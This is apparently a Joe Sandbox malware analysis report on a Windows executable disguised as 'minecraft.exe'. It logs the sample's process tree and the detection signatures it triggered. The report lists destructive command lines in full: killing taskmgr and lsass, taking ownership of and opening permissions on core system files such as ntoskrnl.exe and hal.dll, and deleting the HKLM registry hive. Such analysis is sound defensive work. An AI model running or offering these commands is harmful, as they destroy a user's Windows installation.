Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
minecraft.exe

Overview

General Information

Sample name:minecraft.exe
Analysis ID:1544867
MD5:09718d571b01cb93e6f983be7b99a4b2
SHA1:d2d1212212bfc691e115b24e8132ae4658e510e8
SHA256:6eb25168bde4a9e7f3a273229ca0fbf4f17133788b5c68bf3151eb48826e1169
Tags:exeuser-MDMCk10
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Recursive Takeown
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • minecraft.exe (PID: 7796 cmdline: "C:\Users\user\Desktop\minecraft.exe" MD5: 09718D571B01CB93E6F983BE7B99A4B2)
    • cmd.exe (PID: 7888 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B39.tmp\5B3A.tmp\5B3B.bat C:\Users\user\Desktop\minecraft.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • fsutil.exe (PID: 7940 cmdline: fsutil dirty query C: MD5: DE00EDA7134D3365E6074700E3008CAD)
      • taskkill.exe (PID: 7956 cmdline: taskkill /f /im taskmgr.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 7984 cmdline: taskkill /f /im regedit.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • takeown.exe (PID: 8012 cmdline: takeown /f C:\Windows\System32\hal.dll /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 8028 cmdline: icacls C:\Windows\System32\hal.dll /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 8080 cmdline: takeown /f C:\Windows\System32\winload.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 8096 cmdline: icacls C:\Windows\System32\winload.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 8116 cmdline: takeown /f C:\Windows\System32\winresume.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 8132 cmdline: icacls C:\Windows\System32\winresume.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 8148 cmdline: takeown /f C:\Windows\System32\winlogon.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 8164 cmdline: icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 8184 cmdline: takeown /f C:\Windows\System32\wininit.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 7200 cmdline: icacls C:\Windows\System32\wininit.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 7252 cmdline: takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 1184 cmdline: icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 7288 cmdline: takeown /f C:\Windows\System32\regedit.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 7412 cmdline: icacls C:\Windows\System32\regedit.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 6084 cmdline: takeown /f C:\Windows\System32\taskmgr.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 2940 cmdline: icacls C:\Windows\System32\taskmgr.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 7208 cmdline: takeown /f C:\Windows\System32\consent.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 7584 cmdline: icacls C:\Windows\System32\consent.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 6404 cmdline: takeown /f C:\Windows\System32\drivers /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 6716 cmdline: icacls C:\Windows\System32\drivers /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • takeown.exe (PID: 6648 cmdline: takeown /f C:\Windows\System32\shutdown.exe /r /d y MD5: D258A76AA885CBBCAE8C720CD1C284A5)
      • icacls.exe (PID: 5872 cmdline: icacls C:\Windows\System32\shutdown.exe /grant everyone:F /t MD5: 48C87E3B3003A2413D6399EA77707F5D)
      • taskkill.exe (PID: 5688 cmdline: taskkill /f /im lsass.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • reg.exe (PID: 180 cmdline: reg delete HKLM /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • wlrmdr.exe (PID: 4940 cmdline: -s -1 -f 2 -t Your PC will automatically restart in one minute -m Windows ran into a problem and needs to restart. You should close this message now and save your work. -a 3 MD5: EF9BBA7A637A11B224A90BF90A8943AC)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: takeown /f C:\Windows\System32\hal.dll /r /d y, CommandLine: takeown /f C:\Windows\System32\hal.dll /r /d y, CommandLine|base64offset|contains: , Image: C:\Windows\System32\takeown.exe, NewProcessName: C:\Windows\System32\takeown.exe, OriginalFileName: C:\Windows\System32\takeown.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B39.tmp\5B3A.tmp\5B3B.bat C:\Users\user\Desktop\minecraft.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7888, ParentProcessName: cmd.exe, ProcessCommandLine: takeown /f C:\Windows\System32\hal.dll /r /d y, ProcessId: 8012, ProcessName: takeown.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: minecraft.exeAvira: detected
Source: minecraft.exeReversingLabs: Detection: 34%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.6% probability
Source: minecraft.exeJoe Sandbox ML: detected
Source: Binary string: AcroExch.PDBookmark9o source: reg.exe, 0000001F.00000003.1511553346.000001B6128F4000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\minecraft.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\Desktop\minecraft.exeFile opened: C:\Users\user\AppData\Local\Temp\5B39.tmpJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Users\user\Desktop\minecraft.exeFile opened: C:\Users\user\AppData\Local\Temp\5B39.tmp\5B3A.tmp\5B3B.tmpJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Users\user\Desktop\minecraft.exeFile opened: C:\Users\user\AppData\Local\Temp\5B39.tmp\5B3A.tmpJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeCode function: 0_2_000000014000B64C NtdllDefWindowProc_W,GetWindowLongPtrW,GetWindowTextLengthW,RtlAllocateHeap,GetWindowTextW,EnableWindow,DestroyWindow,UnregisterClassW,0_2_000000014000B64C
Source: C:\Windows\System32\cmd.exeFile deleted: C:\Windows\System32\drivers\DriverDataJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeCode function: 0_2_00000001400138E50_2_00000001400138E5
Source: C:\Users\user\Desktop\minecraft.exeCode function: 0_2_00000001400154F00_2_00000001400154F0
Source: C:\Users\user\Desktop\minecraft.exeCode function: 0_2_00000001400151600_2_0000000140015160
Source: C:\Users\user\Desktop\minecraft.exeCode function: 0_2_00000001400151700_2_0000000140015170
Source: C:\Users\user\Desktop\minecraft.exeCode function: 0_2_00000001400131750_2_0000000140013175
Source: C:\Users\user\Desktop\minecraft.exeCode function: 0_2_00000001400102100_2_0000000140010210
Source: C:\Users\user\Desktop\minecraft.exeCode function: 0_2_00000001400162100_2_0000000140016210
Source: C:\Users\user\Desktop\minecraft.exeCode function: 0_2_000000014000EA480_2_000000014000EA48
Source: C:\Users\user\Desktop\minecraft.exeCode function: 0_2_000000014001366E0_2_000000014001366E
Source: C:\Users\user\Desktop\minecraft.exeCode function: 0_2_000000014000B7580_2_000000014000B758
Source: C:\Users\user\Desktop\minecraft.exeCode function: 0_2_0000000140012FDD0_2_0000000140012FDD
Source: minecraft.exe, 00000000.00000003.1704537164.000000000057C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs minecraft.exe
Source: minecraft.exe, 00000000.00000002.1704888816.000000000057D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs minecraft.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete HKLM /f
Source: reg.exe, 0000001F.00000003.1511553346.000001B6128F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .vbproj
Source: classification engineClassification label: mal64.winEXE@59/2@0/0
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Users\user\Desktop\minecraft.exeFile created: C:\Users\user\AppData\Local\Temp\5B39.tmpJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B39.tmp\5B3A.tmp\5B3B.bat C:\Users\user\Desktop\minecraft.exe"
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "taskmgr.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "regedit.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "lsass.exe")
Source: C:\Users\user\Desktop\minecraft.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: minecraft.exeReversingLabs: Detection: 34%
Source: unknownProcess created: C:\Users\user\Desktop\minecraft.exe "C:\Users\user\Desktop\minecraft.exe"
Source: C:\Users\user\Desktop\minecraft.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B39.tmp\5B3A.tmp\5B3B.bat C:\Users\user\Desktop\minecraft.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fsutil.exe fsutil dirty query C:
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im taskmgr.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im regedit.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\hal.dll /r /d y
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /t
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winload.exe /r /d y
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winload.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winresume.exe /r /d y
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winlogon.exe /r /d y
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\wininit.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\regedit.exe /r /d y
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\regedit.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\taskmgr.exe /r /d y
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\taskmgr.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\consent.exe /r /d y
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\consent.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\drivers /r /d y
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\drivers /grant everyone:F /t
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\shutdown.exe /r /d y
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\shutdown.exe /grant everyone:F /t
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im lsass.exe
Source: unknownProcess created: C:\Windows\System32\wlrmdr.exe -s -1 -f 2 -t Your PC will automatically restart in one minute -m Windows ran into a problem and needs to restart. You should close this message now and save your work. -a 3
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete HKLM /f
Source: C:\Users\user\Desktop\minecraft.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B39.tmp\5B3A.tmp\5B3B.bat C:\Users\user\Desktop\minecraft.exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fsutil.exe fsutil dirty query C:Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im taskmgr.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im regedit.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\hal.dll /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winload.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winload.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winresume.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winresume.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\winlogon.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\wininit.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\ntoskrnl.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\regedit.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\regedit.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\taskmgr.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\taskmgr.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\consent.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\consent.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\drivers /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\drivers /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\shutdown.exe /r /d yJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\shutdown.exe /grant everyone:F /tJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im lsass.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete HKLM /fJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\takeown.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\takeown.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: dui70.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: duser.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: windows.ui.immersive.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: bcp47mrm.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: uianimation.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: dxcore.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: dcomp.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\wlrmdr.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\minecraft.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: minecraft.exeStatic PE information: Image base 0x140000000 > 0x60000000
